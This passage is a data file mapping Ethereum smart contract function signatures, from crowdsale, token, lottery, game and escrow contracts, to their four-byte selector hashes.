"tokenCents()": "0x38af4eff", "ESOPAddress()": "0xa0999436", "_distDay()": "0x3ddb77bd", "bountyCap()": "0xfb1161f1", "controllerAddr()": "0xee255c57", "PRE_ICO_DURATION()": "0x45ad55cc", "reservedTokensDestinationsLen()": "0xc3310517", "nextTicketPrice()": "0x1828b254", "shopHelmet()": "0xf0f46302", "numberOfWagersToMinimumTimeout()": "0xb8dd7a5b", "securityWallet()": "0x87ed90ba", "totalLBSold_GENERAL_2()": "0xe122c028", "nextReferrerId_()": "0xa9ebeb25", "jpMinBet()": "0x6c8429fd", "smallCount()": "0xd9ab1ec9", "RoundId()": "0x509a13dd", "contributionTarget_()": "0xf2ab59d9", "count_donors()": "0x85ca165a", "deathData_f14()": "0x5d1be4e5", "LC()": "0x2720e4f6", "totalTRsWagered()": "0x2e729daf", "_adeptToken()": "0x096908f9", "stopTime()": "0x03ff5e73", "lockDonationReceiver()": "0x974cf025", "CORRECTION()": "0xce5e9ffb", "merchantWallet()": "0xbc85e064", "increaseBase()": "0x2e23062d", "Price()": "0x9dfde201", "lastAssigned()": "0x6a22b09a", "divPoolAmt()": "0x06d177c1", "ACTIVE_STATUS()": "0xba70d54a", "feeBurnerWrapperProxyContract()": "0xaf1af4df", "whiteListControllerAddress()": "0x5cf3508a", "totalLimitUSD()": "0x7b25aeca", "DeviceAddr()": "0x5b869e68", "lifePoints()": "0xd21d2cd1", "icoPhaseAmount2()": "0x10369540", "employees()": "0x11e14b2e", "stopEmergencyWithdrawal()": "0x4b467157", "CONTENT_FUND()": "0xe6ecf8a0", "weiTotalReceived()": "0x842249cb", "secondTierDiscountUpperLimitEther()": "0xa78f0489", "noSales()": "0x528ebdd5", "currentNiceGuyIndex()": "0x392c6238", "assetOwnersIndexes()": "0xa0c86718", "partner1_address()": "0x133d27e1", "walletFounder2()": "0x029da1c4", "bonusCreationRate()": "0xa4f5b8c1", "nowSupply()": "0x7e66f15f", "ratePerOneEther()": "0x68536341", "tokensPerEther1()": "0x68c4cac6", "getCurrentRoundLeft()": "0xfb7ae31e", "lastSettlementStartedTimestamp()": "0x07ad3282", "totalWeiLose()": "0xf41dc25f", "DANSSold()": "0xf86b5ebc", "nextWithdrawDayCommunity()": "0x9c839bdd", "PRE_SALE()": "0xe5f79bee", "proposed_beneficiary()": "0x1c8d25bc", "regName()": "0x1f1de456", "phase1Duration()": "0x41c9692b", "EXT_COMPANY_THREE()": "0x6b3fdf16", "transferredManually()": "0xc6f6122d", "buyAllowed()": "0xd1afdb86", "totalNodes()": "0x9592d424", "minedTotalSupply()": "0x2c79aea3", "feeOwner()": "0xb9818be1", "fourthStage()": "0xf2af59bf", "confirmOneSell()": "0x7702b8e4", "BASE_CLB_TO_ETH_RATE()": "0xfbfbb62e", "SCND_CRWDSALE_RATIO()": "0x1a429a0e", "founderTokenWallet()": "0x954ff2ad", "mFUNDING_BONUS()": "0x6503e5ff", "TOKEN_LIMIT()": "0x031bd4c4", "PRIVATEPLACEMENT()": "0xdd3840ef", "fundraisingReservation()": "0x09b13db0", "countOfSaleTokens()": "0xb4d510dd", "LIMIT_STAR5()": "0xa9725a68", "endTimer()": "0xcb2e46f3", "airLiftPrice()": "0xc4052a78", "m_teamId()": "0x8d475461", "positionPrice()": "0xd5812ae1", "currentText()": "0x95980858", "rewardForDrawing()": "0x2e226c84", "FEE_PERCENT()": "0xeaf98d23", "defaultSweeper()": "0x6fcb1500", "SCWhitelist()": "0x2fc35948", "BTCTKN()": "0x93d4673f", "ethReceivedPresaleOne()": "0xbfd13217", "MaxTokens()": "0x707bdf58", "ADMIN_ALLOWANCE()": "0xfc53f958", "checkpoint()": "0xc2c4c5c1", "minimalEthers()": "0x2fa26aaa", "generatedBytes()": "0x23d32d6a", "endTimePre()": "0x8650b6ef", "privateReservedUFT()": "0x04a82adf", "availbleToken()": "0x6f6eacee", "HARD_CAP_IN_TOKEN()": "0xcc23b75b", "ONE_MILLION()": "0x9869b736", "WINTOKENADDRESS()": "0xdb2ac8d8", "allowWithdrawals()": "0x85f0f098", "transferFeeDenum()": "0xf5b57a8d", "ConfirmOwner()": "0xc422d09b", "sumICOStage2USD()": "0x60ddd8e8", "withdrawTipForDeveloper()": "0x034d3b0d", "saleIsGoing()": "0x28252bc4", "tokensForArtist()": "0x48b8ff83", "blocksDelay()": "0x8a689784", "initialAuctionEndTime()": "0x00fca46f", "ownerNegTokens()": "0x1ff7a278", "THAW_CYCLE_LENGTH()": "0x56daf906", "_fCancelDist()": "0xf801fae9", "littClientId()": "0xc35cabf4", "teamUnlock3()": "0x3347d025", "bankermasterReq()": "0xdc7fc898", "setMaxSize(uint256)": "0x816e117c", "sendCrypto(address,uint256)": "0x8d711776", "giveCrypto()": "0xfd97d3c1", "withdrawVested(address)": "0x3c847e52", "startVesting(uint256,uint256)": "0xbf85e628", "mintWithEvent(int256,address,uint256)": "0x422d37c4", "transferWithEvent(address,address,uint256)": "0x0285d554", "setCrowdsale(address,address)": "0xb8b2052c", "setLedger(address,address)": "0x0c77b44e", "setToken(address,address)": "0x1da26a8b", "Controller(address,address,address)": "0x8863f31d", "tokenSetCrowdsaleManager(address,address)": "0x5ce7c7e0", "tokenWithdrawEther(address)": "0x42cdfe37", "TokenManager(address[],uint256)": "0x11fb57e2", "test_3_method()": "0xae3f4a6c", "test_2_method()": "0x668eef5b", "after_test_2_method()": "0x78415956", "test_1_method()": "0x79456cb6", "after_test_1_method()": "0x3545acb0", "SubContract()": "0xa02d2376", "isRequestFromOwnerOrMeterKey(address)": "0xd26da39e", "resetMeter(address)": "0xb1199a87", "updateMeterKey(address)": "0x0ba8916f", "updateMeterValue(uint256)": "0x9b81c8d3", "WaterMeterAcorn(address)": "0xcd92dec0", "getIdProject()": "0x022b8a7f", "getBetfundingAddress()": "0xaf7a1762", "getDifficulty()": "0xb6baffe3", "getPot()": "0x403c9fa8", "setProjectToVerify(address,uint256)": "0x4ea14479", "setNumNumbers(uint256)": "0x257d3db5", "autoJudge()": "0x2f700fb6", "ANT(address)": "0x6a3d42ef", "changeVestingWhitelister(address)": "0xfb13a707", "doSetCanCreateGrants(address,bool)": "0xf6e9b85c", "setCanCreateGrants(address,bool)": "0x1f9a391c", "MiniMeIrrevocableVestedToken(address,address,uint256,string,uint8,string,bool)": "0x536c26e5", "documentExists(bytes32)": "0xcbfe6d41", "transferDocument(bytes32,address)": "0xdeaf5a5e", "createHistory(bytes32,address,address)": "0x2f98511c", "newDocument(bytes32)": "0x2847a7af", "cancel(uint256[])": "0x2e340823", "ExternalAccountWalletConnector(address)": "0x613bc081", "TestCrowdsaleController(uint256,address,uint256)": "0xda293136", "getNumParticipants()": "0xfd478ca9", "getDesignatedReportingEndTime()": "0x9f941f69", "getWinningReportingParticipant()": "0x6e106628", "getCrowdsourcer(bytes32)": "0xc35c08bd", "getReportingParticipant(uint256)": "0xbbd37ef3", "getInitialReporter()": "0x1a3739ec", "getStakeInOutcome(bytes32)": "0x66d12fad", "getParticipantStake()": "0x2c154345", "disavowCrowdsourcers()": "0x449d0f29", "getOrCreateDisputeCrowdsourcer(bytes32,uint256[],bool)": "0x992cb59f", "distributeValidityBond()": "0xd61191bd", "redistributeLosingReputation()": "0xa0548d2f", "contribute(uint256[],bool,uint256)": "0x58e61e12", "doInitialReport(uint256[],bool)": "0x0ea9e4f1", "createShareToken(uint256)": "0xb84a6849", "assessFees()": "0x0d465263", "sendEther(uint256,address)": "0xcb16d4a2", "genericAction(address,bytes32[])": "0x6ce15a54", "f4(uint256,uint256)": "0xf57a1ccc", "f3(uint256,uint256)": "0xf6ad660b", "f1(uint256,uint256)": "0x7cb1442c", "test_0_ensureDefaultRulesSetToFalse()": "0x16d45615", "addManyToWhitelist(address[])": "0x8c10671c", "pct(uint256,uint256)": "0x78a1b7c2", "_executeVote(uint256)": "0xb18019bd", "_vote(uint256,bool,address)": "0x012a08f8", "_newVoting(bytes,string)": "0xd2ace0cc", "getVotingScriptAction(uint256,uint256)": "0x1ffd42ab", "getVotingMetadata(uint256)": "0x00e38410", "getVoting(uint256)": "0x3afc7282", "canExecute(uint256)": "0xcc63604a", "canVote(uint256,address)": "0xcdb2867b", "newVoting(bytes,string)": "0x407e5e5d", "changeMinAcceptQuorumPct(uint256)": "0x036e4220", "BiathlonNode(address,string,string,string)": "0xb7491d65", "lotteryCloseInsurance(uint16)": "0x9e1224ce", "finalizeLottery(uint16,bytes32,uint256)": "0xf22c71e5", "purchaseTicket(uint16,uint16[])": "0xaa3aef50", "getLotteryDetails(uint16)": "0x58d782be", "initLottery(uint16,uint256,uint8,bytes32)": "0x3ec548b6", "getSharePrice()": "0x5b1dac60", "getInvestmentValue()": "0x4dd93bd3", "getSharesCount()": "0xc7e58644", "bankRollDivest(uint256)": "0x19141100", "bankRollInvest()": "0xb9f615d7", "changeDivestmentFee(uint16)": "0xbbaa7345", "changeInvestmentFee(uint16)": "0x3a15bbee", "EthBankRoll(uint16)": "0x7d1f067c", "cmulpow2(address,uint256)": "0x4de952c7", "cpow2(address,uint256)": "0x3214e6ba", "libpow2(address,uint256)": "0x6a0ac115", "cmulpow2(uint256)": "0x3b1a4170", "FooContractCall(address)": "0xdc965479", "cpow2(uint256)": "0x73fe1673", "mulpow2(uint256)": "0xaf05fc63", "pow2(uint256)": "0x442b7ffb", "deleteRegion(uint256)": "0x47ef01a1", "createRegion(uint256,uint256,uint256,uint256)": "0x5acb6787", "purchase(address[16],uint256)": "0x1fc7d658", "PHPCoin(uint256,string,string)": "0xe18af2b8", "ChiMarket()": "0x24f99ba4", "updatePrice(bytes32,uint256)": "0x5f704f3e", "updateManager(address)": "0x58aba00f", "updateAdmin(address)": "0xe2f273bd", "Scanetchain()": "0x156c0ed4", "FoshaAirdrop()": "0x4ea9560e", "materializeBalanceIfNeeded(address,uint256)": "0x33223f1b", "getVirtualBalance(address)": "0xe34514ba", "virtualBalanceOf(address)": "0xcb742358", "AbstractVirtualToken()": "0x36c63b8d", "buy(address,bytes32)": "0x9058e228", "PushToken()": "0x31483bdc", "_calculateTokens(uint256,uint8,uint256)": "0xe5c2205e", "_discount(uint8)": "0xbd9c33bc", "getAccountPendingValue(address)": "0xf64ffde4", "hasAccountPendingOrders(address)": "0x3e4bdce4", "enableAutoSeller()": "0x3f606cfc", "disableAutoSeller()": "0x6efaf16c", "dropManualState()": "0x4f4b30ba", "defineDiscountBorderLines()": "0x89d3ed8d", "transferPreSaleTokens(address,uint256)": "0x2e2ff7c6", "DateCoinCrowdsale(uint256,uint256,uint256,address,address,address,address)": "0xc6dd5098", "DateCoin(uint256)": "0x84653605", "GRAND()": "0xf2f85fce", "getSncTokenIssuance(uint256,uint256)": "0xa31477b4", "participantContributionInEth(address)": "0x2ed4595a", "isAddressAllowedInPresale(address)": "0x59b9510a", "icoInProgress()": "0x6f1427b2", "getSncTokenAddress()": "0x0510e186", "removePresaleContributor(address)": "0x847c096d", "changeMultisigAddress(address)": "0x0242622b", "addPresaleContributors(address[])": "0x5a1f892c", "SunContractIco(uint256,address)": "0xb2e0baee", "_findParticipant(uint256)": "0x9c4fc563", "end(bytes32)": "0x7015913c", "_decode(bytes32,bytes32)": "0x5c7cbb0f", "reveal(bytes32)": "0x701fd0f1", "participate(bytes32)": "0x0a14504c", "begin(bytes32)": "0x75aa8705", "Fundraiser(address,address,uint256,uint256,address,uint256,bytes32,uint256,uint256,uint256,uint256,uint256)": "0xc0c4d8a8", "releaseVanityUrl(string)": "0xb223d285", "reserveVanityURLByOwner(address,string)": "0xd1048bc9", "transferOwnershipForVanityURL(address)": "0xbe981ff4", "changeVanityURL(string)": "0xc6fe317f", "checkForValidity(string)": "0x758822e6", "_toLower(string)": "0x447d7a1d", "retrieveVanityForWallet(address,address)": "0xef4886ef", "retrieveWalletForVanity(string)": "0x69ba820e", "VanityURL()": "0xca278feb", "adjustCap()": "0x67de698d", "MonoretoToken(uint256)": "0x0a4543ec", "setUsdMnr(uint256)": "0xfe65066e", "setUsdEth(uint256)": "0x27f85c13", "BaseMonoretoCrowdsale(uint256,uint256,uint256)": "0xe09ea701", "Unagold(address)": "0xa1b9e03f", "fetchCurrentSatoshiState()": "0xe20ff6f7", "Satoshi()": "0xb285041d", "isPresaleFull()": "0x83dfd040", "Presale(address,address,address,uint256,uint256,uint256,uint256)": "0x35c969ea", "CBCK(uint256,string,string)": "0x83fd8a64", "validTransfer(uint256)": "0xf8ab745e", "batchtransfer(address[],uint256[])": "0x619cf5f9", "transferInner(address,uint256)": "0x2e338df5", "VAAToken()": "0x681c7e2b", "setCloseTime(uint256)": "0x3be3a3f5", "setOpenTime(uint256)": "0xf60ba338", "killAdminOnly()": "0x4b031397", "setQuantityAdminOnly(uint256,uint256)": "0xc5401559", "decrementQuantity(uint256)": "0x7c78cb13", "transferFundsAdminOnly(address,uint256)": "0xa5e7131e", "checkoutCart(string)": "0xce47befd", "getCartSubtotal(address)": "0x3d90eeb9", "getCartItemInfo(address,uint256)": "0x74bff257", "getCartLength(address)": "0xe24cddd6", "addToCart(uint256,string)": "0x0efe5fb7", "getSandwichInfo(uint256)": "0x538a289a", "getMenu()": "0x8b384f9f", "SandwichShop()": "0xf029e102", "CarPark()": "0x834f54d0", "certificate(bytes32,bytes32)": "0x3c1a7eda", "AttoresDigitalCertificates(address)": "0x8654b78d", "XDToken()": "0x95d395dd", "contractSpend(address,uint256)": "0x3555fa90", "removeContract(address)": "0xc375c2ef", "burnMktCoins()": "0xced659b6", "burnIcoCoins()": "0xf22d022b", "reclaimFunds()": "0xcce4bd52", "mintIcoTokenMultiple(address[],uint256[])": "0x2b2b2882", "mintMarketing(address,uint256)": "0x763f4011", "changeAdminWallet(address)": "0x4b43b582", "coinLockRmoveMultiple(address[])": "0x659a46e8", "coinLockRemove(address)": "0x81c8b563", "LeeSungCoin()": "0x580f2427", "OwnerHelper()": "0x8f937574", "withdrawPaymentsRegistrar(address,uint256)": "0x22b1a226", "setDonationReward(uint256)": "0x8ea73a7c", "costs(uint256)": "0x49b3b29f", "CooldownThreshold()": "0x4597dc8e", "setTeleportPrice(uint256)": "0x45334894", "oldest()": "0x3c3c22b3", "getCharacter(uint32)": "0x3728bec2", "numCharactersXType(uint8)": "0x29b20bb6", "collectFees(uint128)": "0x28acb002", "triggerVolcanoEruption()": "0x1e466eee", "protectionPrice()": "0x19f353bb", "percentageToKill()": "0x11a5a793", "sellCharacter(uint32)": "0x0fa6002e", "hello(address)": "0x84fae760", "setRequestCancellationMinimumTime(uint32)": "0x05b64993", "setRelayer(address)": "0x6548e9bc", "setArbitrator(address)": "0xb0eefabe", "withdrawFees(address,uint256)": "0xad3b1b47", "transferMinusFees(address,uint256,uint128,uint16)": "0xb4654d98", "increaseGasSpent(bytes32,uint128)": "0xfcff1eaf", "relay(bytes16,address,address,uint256,uint16,uint128,uint8,bytes32,bytes32,uint8,uint128)": "0x7bd352b7", "relaySellerRequestCancel(bytes16,address,address,uint256,uint16,uint128,uint8,bytes32,bytes32)": "0x036c36eb", "relaySellerCancel(bytes16,address,address,uint256,uint16,uint128,uint8,bytes32,bytes32)": "0x31d36cf0", "relayRelease(bytes16,address,address,uint256,uint16,uint128,uint8,bytes32,bytes32)": "0x520c3db7", "relayBuyerCancel(bytes16,address,address,uint256,uint16,uint128,uint8,bytes32,bytes32)": "0xd81d5062", "relaySellerCannotCancel(bytes16,address,address,uint256,uint16,uint128,uint8,bytes32,bytes32)": "0xa246d83b", "sellerRequestCancel(bytes16,address,address,uint256,uint16)": "0x6b407837", "sellerCancel(bytes16,address,address,uint256,uint16)": "0x35adc0c5", "buyerCancel(bytes16,address,address,uint256,uint16)": "0x2cc9636c", "disableSellerCancel(bytes16,address,address,uint256,uint16)": "0x5c810f09", "release(bytes16,address,address,uint256,uint16)": "0xe9600f12", "LocalEthereumEscrows()": "0xb6e49fd9", "transferByOwner(address,uint256)": "0x21e92d49", "CICoin()": "0x314848fa", "setInfo(bytes32,uint256)": "0x5f65d703", "mintICD(address,uint256)": "0x0d61cd5d", "computeReward(uint256)": "0x47bb1883", "claimReferralBonus()": "0x1e375ab9", "claimTwitterBonus()": "0xf0330d54", "mintPCD(address,uint256)": "0x742cd75d", "declareCheaters(address[])": "0xb5a0596e", "declareCheater(address)": "0x10f88546", "registerEtherBalance(address)": "0x89efa1b5", "setMaxReferrals(uint256)": "0x6a1d8713", "setERC721Address(address)": "0x9a03d9a3", "HODLIT()": "0x47ddb165", "setBalanceOf(address,uint256)": "0xb46310f6", "setAssociatedContract(address)": "0x52f445ca", "TokenState(address,address)": "0xc9d2d217", "nominateOwner(address)": "0x5b94db27", "Owned(address)": "0xd2f8dd45", "getFashionsAttrs(uint256[])": "0x0d047d49", "getOwnFashions(address)": "0x15de4607", "getFashion(uint256)": "0x425189e0", "safeTransferByContract(uint256,address)": "0x18ad052b", "destroyFashion(uint256,uint16)": "0x0378f83f", "changeFashionAttr(uint256,uint16[4],uint16[4],uint16)": "0x75b599c0", "createFashion(address,uint16[9],uint16)": "0x9cc477b2", "_safeTransferFrom(address,address,uint256,bytes)": "0x66a3de2a", "WarToken()": "0xd12c7b52", "getActionContract(address)": "0x4ea34cdb", "setActionContract(address,bool)": "0x6fb642de", "doUnpause()": "0x30efb8d3", "doPause()": "0x67d0661d", "AccessAdmin()": "0x737d5f39", "validateGasPrice(uint256)": "0x6b4dff1f", "getListedTokens()": "0x2ba996a5", "transferAdminQuickly(address)": "0x7acc8678", "getPlayerEnergyByAddress(address)": "0x65e2409b", "getPlayerEnergy(uint32)": "0x749fe7c4", "getPlayerId(address)": "0xc4ae16a8", "getPlayerPoint(uint32)": "0xc1d6cbd8", "isOnBattle(address,uint64)": "0x46a7551d", "getPlayerDataByAddress(address)": "0x36c84de5", "getPlayerData(uint32)": "0x254c70ac", "updateEnergy(uint32,uint32,uint256)": "0xc7a86dd2", "updatePlayerPoint(uint32,uint32,uint32,uint32,int256)": "0x144a88a0", "setPlayer(address,uint64,uint64,uint64,uint64,uint64,uint64)": "0x49a92910", "updateConfig(uint32,int256)": "0x7510a98c", "UpdateMaintaining(bool)": "0x48ef5aa8", "change(string,string)": "0x83841e0c", "recoverTokens(uint256)": "0x30599fc5", "_bytes32(string)": "0x3d13341c", "_forwardTransferFromToICAPWithReference(address,bytes32,uint256,string,address)": "0x9b487f3f", "_forwardTransferFromWithReference(address,address,uint256,string,address)": "0x14cba002", "_forwardApprove(address,uint256,address)": "0x7bcdc2f0", "proxyTransferFromToICAPWithReference(address,bytes32,uint256,string,address)": "0xa69032ee", "lockAsset(bytes32)": "0xd0169c1e", "isLocked(bytes32)": "0x32a16f4e", "registryICAP()": "0xa0f15b87", "institutions(bytes32)": "0x95829738", "parse(bytes32)": "0x4f71ef81", "withdrawEther(address,uint256)": "0x522f6815", "getMonsterReturn(uint64)": "0xf4029e92", "getExpectedBalance(address)": "0xc9537838", "getMonsterObjId(address,uint256)": "0x75fe2e33", "getMonsterDexSize(address)": "0x47c17bac", "getExtraBalance(address)": "0xc782fc60", "getMonsterName(uint64)": "0x0d25b6f2", "getMonsterObj(uint64)": "0x07202460", "getMonsterClass(uint32)": "0x9d29cac4", "setExtraBalance(address,uint256)": "0xb55cdbf9", "setUint(int256,uint256,uint8,uint16,uint32,uint256)": "0xa89f173c", "ParaType()": "0x400eb4f5", "dividend()": "0x0ff8cf9b", "getCustomValue()": "0xc7398dd4", "increment(int256,int256)": "0x7b69db5c", "Incrementer3()": "0x83c08784", "Base()": "0x5ea102b0", "rectangle(uint256,uint256)": "0x44767548", "test_me(int256,int256,int256)": "0x7eda09e8", "TimerAuction(string,uint256)": "0xd38537cf", "updateCourseRate(address,uint256)": "0x7686136a", "createCourse(string,string,uint256)": "0xa4adb24b", "getCourseCount()": "0x96cfda06", "Teacher(address)": "0x9102bcc8", "changeDecimals(uint8)": "0xc112dfa3", "changeSymbol(string)": "0xa3895fff", "changeName(string)": "0x5353a2d8", "RemiCoin(uint256,string,string,uint8)": "0xd30a969a", "Owner()": "0xb4a99a4e", "applyAuditorsCheckUpdate(address,address,uint64)": "0x2668748d", "applyRuntimeUpdate(address,address,uint64,uint64)": "0xdee5216e", "test(uint256,int256,uint256,uint256,uint256)": "0x230cf412", "Lesson_6(address,uint256)": "0x12810fd8", "DaoAccount(address,address)": "0xa2e5f168", "setUserValue(bytes20,uint256,uint256)": "0xf61ca87a", "getUserValue(bytes20,uint256)": "0xbfe44c4b", "addUserValueName(bytes20)": "0xb81db9da", "remove(bytes20)": "0x26e9fd9e", "add(bytes20,address)": "0xe8de636c", "setHoldDuration(uint256)": "0x30eb4ba8", "InsuranceHolder(address,address)": "0x98b9d151", "record(uint256)": "0x2c16cd8a", "totalSupplyUnlocked()": "0xc0f5dc97", "totalSupplyLocked()": "0x58341922", "totalSupplyLocked2Y()": "0x622c77fe", "totalSupplyLocked1Y()": "0xc0c3da9c", "balanceOfLocked(address)": "0xe960bb48", "balanceOfLocked2Y(address)": "0xbc5dc168", "balanceOfLocked1Y(address)": "0x1ab3c515", "kycVerify(address)": "0x1881b0f0", "addPrecommitment(address,uint256)": "0x3818d907", "finalise()": "0xa4399263", "setTokensPerKEther(uint256)": "0x0e9d02cc", "CRAToken(address)": "0x1774218e", "getBenificiary()": "0xe9391db9", "Crowdsale(address[],uint256,uint256)": "0x51379adb", "sendNugget(address,uint256)": "0xf8e3aa92", "nugget(uint256)": "0x84fc8050", "catchYou(address,uint256)": "0xb423c31e", "PrimasToken()": "0x4346ea77", "fxpDiv(int256,int256,int256)": "0x82c198ef", "fxpMul(int256,int256,int256)": "0xf92a7595", "getInt256Max()": "0x09e7ec7a", "getInt256Min()": "0xd35262ef", "max(int256,int256)": "0x81fe5786", "min(int256,int256)": "0x29aa9cbe", "sub(int256,int256)": "0xadefc37b", "div(int256,int256)": "0x43509138", "mul(int256,int256)": "0xbbe93d91", "queryOracle(string,string)": "0x8f9a6da1", "q_test(string)": "0x3888dca0", "OraclizeBet()": "0x299ee814", "Resource(address,string,string,string)": "0xda9893dd", "subscribe(uint256)": "0x0f574ba7", "userSubscriptionsLength(address)": "0xda2d7b70", "isValidSubscription(bytes32)": "0xdd8d11e2", "getSubscriptionClosedAt(bytes32)": "0x8b91124d", "getSubscriptionServiceID(bytes32)": "0xe3debbbe", "getSubscriptionOwner(bytes32)": "0x93abc530", "getSubscriptionNonce(bytes32)": "0x8b91e9a2", "getSubscriptionValue(bytes32)": "0x9840a6cd", "getSubscription(bytes32)": "0x1f32768e", "claim(bytes32,uint256,uint256,uint8,bytes32,bytes32)": "0x3e8b1dd7", "verifyPayment(bytes32,uint256,uint256,uint8,bytes32,bytes32)": "0x6012042e", "verifySignature(bytes32,uint256,uint256,uint8,bytes32,bytes32)": "0xf60744d5", "getHash(address,uint256,uint256,uint256)": "0x8ebac11b", "makeSubscriptionID(address,uint256)": "0x0de607c3", "addService(string,string,int256,uint256,uint256,uint256)": "0x8bbf037c", "disableService(uint256)": "0x91499e2d", "enableService(uint256)": "0x78fe2951", "deleteService(uint256)": "0x74e29ee6", "getService(uint256)": "0xef0e239b", "servicesLength()": "0x1ebfdca0", "userServicesLength(address)": "0x1d7c5cd1", "newGreeting(string)": "0x4ac0d66e", "amountOfOpenRFQs()": "0xfb12ee85", "divide(uint256,uint256)": "0xf88e9fbf", "setTradersContract(address)": "0x03bf4fb7", "decreaseSupply(uint256)": "0x98e52f9a", "increaseSupply(uint256)": "0xb921e163", "setTokenExchangeRate(uint256)": "0xcb7b8673", "stopFunding()": "0x4477c5da", "startFunding(uint256,uint256)": "0x775c46cd", "isMemberInDescendant(address,bytes32)": "0x6bc85107", "getChildrenLength(bytes32)": "0xba5673c3", "removeChild(address,bytes32,bytes32)": "0x0d2f99d0", "addChild(address,bytes32,bytes32)": "0x26faae42", "isMember(address,bytes32)": "0xcfd32ef7", "removeMembers(address,bytes32,address[])": "0x4962ab01", "addMembers(address,bytes32,address[])": "0x459ae9b3", "pre_maxGoal()": "0x37981c32", "UNIT_PRICE()": "0xafa40bbd", "CONTRACT_VERSION()": "0x38b90333", "totalIco()": "0x09e0a77c", "weAreClosed()": "0x96dfcc21", "feesend()": "0x166728cb", "developerLock()": "0xfc98f71e", "bonusOver3ETH()": "0xec035aac", "poolInvestors()": "0xc7aa278e", "depositWalletAddress()": "0x75e8f289", "developerTemplateAmountLimit()": "0xd46dbca1", "Token_For_Circulation()": "0xae3d27ed", "minwei()": "0x05db3b82", "soldTokensCount()": "0x8b96801e", "OX_ORG()": "0xe4cd7d96", "walletForCommunity()": "0x72c4ae6b", "medalName()": "0x23169ec4", "lastBlock_f5Hash_uint256()": "0xa7e81d22", "regStopTime()": "0x297c9cd9", "minInvestedLimit()": "0xd64196f8", "miaomiao()": "0xb28fd472", "ethereum2USDprice()": "0xcf4246a6", "AVAILABLE_IN_MAIN()": "0x77c76449", "SHARE_TEAM()": "0x761c4524", "amountOfPerRelease()": "0x3ed7530d", "act()": "0xee42b10b", "Addr5()": "0x22e256e2", "zlotsJackpot()": "0x5a9e91df", "countriesCount()": "0xafe8b652", "transSupply()": "0x87b47e4f", "oslikToken()": "0x866e5162", "ICO_PHASE2_AMOUNT()": "0xd4b088f9", "harvestQuorumPercent()": "0xbf53e3ba", "sigDestinationTransferFrom()": "0xbc39d42f", "PRE_SALE_MAX_CAP()": "0x07142877", "currentSaleSold()": "0xdcd6561d", "dateMainStart()": "0xaa63dea4", "totalReceivedEth()": "0x7801fc3e", "Securities_1()": "0xa21a32cb", "privateIcoSold()": "0x26c009cb", "endEarlyStage4()": "0x1c8670fc", "allocator()": "0xaa5dcecc", "outOverRoundId()": "0xe3f4937f", "ZTHTKNADDR()": "0xf21502e5", "chunk3IsAdded()": "0x9d6d78e4", "isPublic()": "0xdc9a1535", "stopsell()": "0x2d52164b", "diviRate()": "0x789b4690", "_robot()": "0x77cb8edd", "minTicketEur()": "0x2b2fbd68", "tokensGranted()": "0x60f17941", "enddate()": "0xc588953e", "goldSymbol()": "0x8983d2e9", "_amountRaised()": "0x6f799cf9", "TOKEN_WALLET()": "0x8ada1957", "sister()": "0xa9ed003d", "lost_and_found_master()": "0xa64278ce", "MAX_TOTAL_ADOPTED_AXIES()": "0xad7738b6", "THRESHOLD2()": "0xf8aa836b", "bytetherOVAddress()": "0xad6d9b89", "presaleBonusAddress()": "0x7f10a3c0", "mdtComparable()": "0xff78d5ed", "issuedTokenBalance()": "0xd869c681", "teamVestingCounter()": "0x1f69f929", "preToken()": "0x6ffea7bd", "deadlineTwo()": "0x0dac3d99", "benTook()": "0xe6f602ff", "maximumFundingGoalInETH()": "0xaf20b964", "snipCoinToEtherExchangeRate()": "0x1fedd70b", "centToken()": "0x7dc0015d", "auditData()": "0x6072ec64", "PRESALE_SUPPLY()": "0x73138e4f", "AAcontributors()": "0x5ab89248", "lrcSent()": "0xc14248a2", "stage2_start()": "0x32611e2b", "ThirdEtherLimit()": "0xc5e991a8", "rateForPhase1()": "0x6420e71c", "addressOfERC20Token()": "0x8280114b", "endClaim()": "0xb2c62d46", "numberClaimToken()": "0xd9144712", "maxMonsterHit()": "0xf91e89db", "usersCanTransfer()": "0xa41347e3", "distributedAutonomousExchange()": "0x8f6612c9", "mintBase()": "0x75524ffd", "projectoperation_beneficiary()": "0xb64c9326", "setSelfOn()": "0x039d0bfa", "setTransferLockFree()": "0x4de504cd", "zilla_remaining()": "0x8cc34ed7", "buyLimitSupplyMax()": "0x85a08f41", "batlordAddress()": "0xa6e26e96", "endCrowdsalePhase1Date()": "0xcf64c42f", "VESTED_PERCENT()": "0xbf6888c8", "officialUrl()": "0x2a39c1ea", "tranchesPayedOut()": "0x7db7c239", "PRESALE_PERCENTAGE_2()": "0x5e48f58f", "rewardPerBlockPerAddress()": "0xe00686e4", "seeAllNumbers()": "0xbf08778c", "allTokensSold()": "0xd6f4e56e", "keepEth()": "0xbbf0f065", "limit6()": "0x8af2d152", "justSendDonations()": "0x8203e7f3", "HonestisNetworkTokenWire3()": "0xc344bc47", "Foosball()": "0xa91cfecf", "BDragon()": "0xeebb7fe9", "isdeposit()": "0xc1ad5bea", "getvalue()": "0x69bd01c4", "getdepositValue()": "0x06177ba8", "withdrawals()": "0xade0e93e", "withdrawtime()": "0xc9c7ef25", "addDeposit(uint256)": "0xa6f1fd51", "getBalanceTeam(address)": "0x9746f42b", "getSumWithdrawals()": "0x71697efa", "calculationTeamsRewards(uint256[])": "0xc30096ef", "createPartnerPlayer(uint256,uint256,uint256,address)": "0x6130d537", "leaveTeam(uint256,uint256)": "0xf503a994", "joinTeam(uint256,uint256)": "0xe853ce64", "createTeam(string,string,uint32,uint32,uint256)": "0x4abfacfd", "_getRandom(uint256,address)": "0x5e6cbd6d", "openBoxPlayer(uint256,uint256)": "0x28c78227", "FMWorld(address,address,address)": "0x70150282", "setCatalogPlayersAddress(address)": "0xe7a0459a", "setPlayerTokenAddress(address)": "0x05b5da23", "getMinTalent(uint256)": "0x1bcf659d", "getMinSkills(uint256)": "0x5e85db0a", "getTeamSumSkills(uint256)": "0x99dfedb4", "getCountTeams()": "0x798d05fa", "getPlayerIdOfIndex(uint256,uint256)": "0xfed73b54", "getCountPlayersOfTeam(uint256)": "0x204d3d65", "getTeamPlayers(uint256)": "0xf2856a2a", "leaveTeam(uint256,address,uint256,uint256)": "0xf5ac481d", "isTeam(uint256)": "0x3e03d50f", "joinTeam(uint256,address,uint256,uint256)": "0xb60e2333", "getCountPosition(uint256,uint256)": "0x8659d573", "getCountPlayersOfOwner(uint256,address)": "0x27506099", "getOwnerTeam(address)": "0xa903073e", "getPlayerTeam(uint256)": "0x43886946", "createTeam(string,string,uint256,uint256,address,uint256)": "0xb0a9b0ff", "getCountSales(uint256,uint256)": "0x5e0c8c8c", 